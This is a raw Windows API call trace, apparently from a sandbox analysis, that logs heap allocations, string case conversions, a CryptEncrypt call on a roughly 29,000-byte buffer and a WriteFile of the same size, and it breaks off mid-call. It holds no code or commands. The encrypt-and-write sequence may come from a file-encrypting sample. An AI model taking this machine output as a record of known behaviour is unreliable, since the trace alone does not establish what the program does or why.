[0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0100.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0100.928] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0100.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0100.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0100.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0100.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0100.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748f8 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0100.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0100.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0100.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0100.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0100.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0100.929] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0100.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e48 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0100.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0100.930] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0100.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0100.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0100.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0100.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0100.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0100.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0100.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0100.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0100.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e48 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0100.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0100.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0100.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0100.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0100.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0100.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0100.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0100.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0100.932] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0100.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0100.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0100.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0100.932] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0100.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0100.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8f5f8 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.934] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0100.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0100.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0100.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0100.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0100.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0100.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0100.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0100.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0100.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0100.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9dc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.935] CryptEncrypt (in: hKey=0x9a4440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x7189, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x7190) returned 1 [0100.935] CharLowerBuffW (in: lpsz="byte[29072]", cchLength=0xb | out: lpsz="byte[29072]") returned 0xb [0100.936] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.936] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.936] CryptEncrypt (in: hKey=0x9a4440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a8f5f8*, pdwDataLen=0x8cef60*=0x7189, dwBufLen=0x7190 | out: pbData=0x2a8f5f8*, pdwDataLen=0x8cef60*=0x7190) returned 1 [0100.937] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0100.937] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0100.937] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0100.937] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0100.937] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.937] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.942] WriteFile (in: hFile=0x458, lpBuffer=0x2a812c8*, nNumberOfBytesToWrite=0x7190, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a812c8*, lpNumberOfBytesWritten=0x8cf5e4*=0x7190, lpOverlapped=0x0) returned 1 [0100.944] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0100.944] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0100.944] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.944] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9b08, cbMultiByte=16, 